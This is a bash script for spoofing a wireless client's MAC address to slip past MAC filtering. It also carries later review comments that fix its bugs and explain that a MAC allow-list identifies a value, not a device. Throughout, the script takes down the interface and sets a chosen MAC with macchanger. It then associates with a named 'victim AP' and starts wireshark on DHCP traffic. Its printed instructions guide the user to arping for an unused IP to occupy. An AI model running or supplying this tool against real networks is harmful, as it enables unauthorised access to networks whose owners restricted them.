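#!/bin/bash
# sets up an interface to spoof a client mac address
# handy for jumping on MAC filtered networks
# coded by thiscodesucks@cybersnipers.com
# some of the code borrowed from the athmacchange.sh script by brad a @ foundstone
#
# change 1: commented out the dhcpcd line...can cause conflicts with target network
#           use dhcpcd -T to get dhcp info then use arping to find an open IP instead
# change 2: madwifi-ng has some broken MAC VAP crap, so we are rewriting the whole script
# change 3: added stuff to work with drivers besides atheros
#
# Arguments (all three are required):
#   $1 - MAC address to assign to the radio (passed to `macchanger -m`)
#   $2 - ESSID to associate with
#   $3 - wireless interface; "wlan0" selects the generic path, any other
#        value selects the madwifi/atheros path that works on wifi0
#
# Review note: the script works because a MAC address is asserted by the
# client itself, so a MAC allow-list identifies a value, not a device.

# Fail on unset variables instead of silently expanding them to "".
set -u

# Print the banner and calling convention to stderr, then exit non-zero so
# that a caller can distinguish a usage error from a completed run.
usage() {
  {
    echo
    echo "MAC Spoof Script v0.3: Because MAC filtering is for kids"
    echo "---------------------------------------------------------------------------"
    echo "Usage: $0 <mac> <essid> <interface>"
    echo
    echo
  } >&2
  exit 2
}

if [ "$#" -lt 3 ]; then
  usage
fi

readonly spoof_mac=$1
readonly essid=$2
readonly iface=$3

echo
echo " MAC Spoof Script v0.3: Because MAC filtering is for kids"
echo "---------------------------------------------------------------------------"
echo

if [ "$iface" != "wlan0" ]; then
  # First we destroy the VAP if it exists
  echo
  echo "Destroying the VAP if it exists"
  # Glob the directory instead of parsing `ls`; the -e test skips the
  # literal pattern when the directory is missing or empty.
  for vap_path in /proc/net/madwifi/*; do
    [ -e "$vap_path" ] || continue
    vap=${vap_path##*/}
    # The original wrote `2>&1 /dev/null`, which handed /dev/null to
    # wlanconfig as an extra argument rather than silencing its output.
    wlanconfig "$vap" destroy > /dev/null 2>&1
    printf '\t%s -destroyed\n' "$vap"
  done

  # Now we take down the interface
  echo "Taking down interface"
  ifconfig wifi0 down

  # Now we change our MAC to one that we know is allowed on the network
  echo "Changing the MAC"
  macchanger -m "$spoof_mac" wifi0

  # Bringing wifi0 back up
  echo "Upping wifi0 now"
  ifconfig wifi0 up

  # Creating a new VAP using the spoofed MAC
  echo "Creating the new VAP"
  wlanconfig ath create wlandev wifi0 wlanmode sta -uniquebssid > /dev/null 2>&1
else
  # Repeating the above commands for non-atheros drivers
  echo "Setting $iface to Managed mode"
  iwconfig "$iface" mode managed

  echo "Taking down $iface"
  ifconfig "$iface" down

  # Now we change the MAC to one we know is allowed on the network
  echo "Changing the MAC"
  macchanger -m "$spoof_mac" "$iface"

  # Bringing up the interface now
  echo "Upping $iface now"
  ifconfig "$iface" up
fi

# Set our interface up to connect to the Victim's AP
echo "Setting our interface to connect to the victim AP"
# Quoted so that an ESSID containing spaces stays a single argument.
iwconfig "$iface" essid "$essid"
ifconfig "$iface" up

# Sleep a bit to allow the connection to happen
sleep 4

# Start wireshark so we can see those happy packets
echo
echo "starting wireshark to look for dhcp packets then we'll send a dhcp Test packet"
echo "once we finish that, you need to run an arping against the available IP block"
echo "looking for an IP that DOESN'T respond...then assign that IP to your interface"
echo
wireshark -i "$iface" -k -f "udp port 68" -H -S -l > /dev/null 2>&1 &

# Give wireshark a bit to get going before we send out test packets to the dhcp server
sleep 3
dhcpcd -T "$iface" > /dev/null 2>&1

exit 0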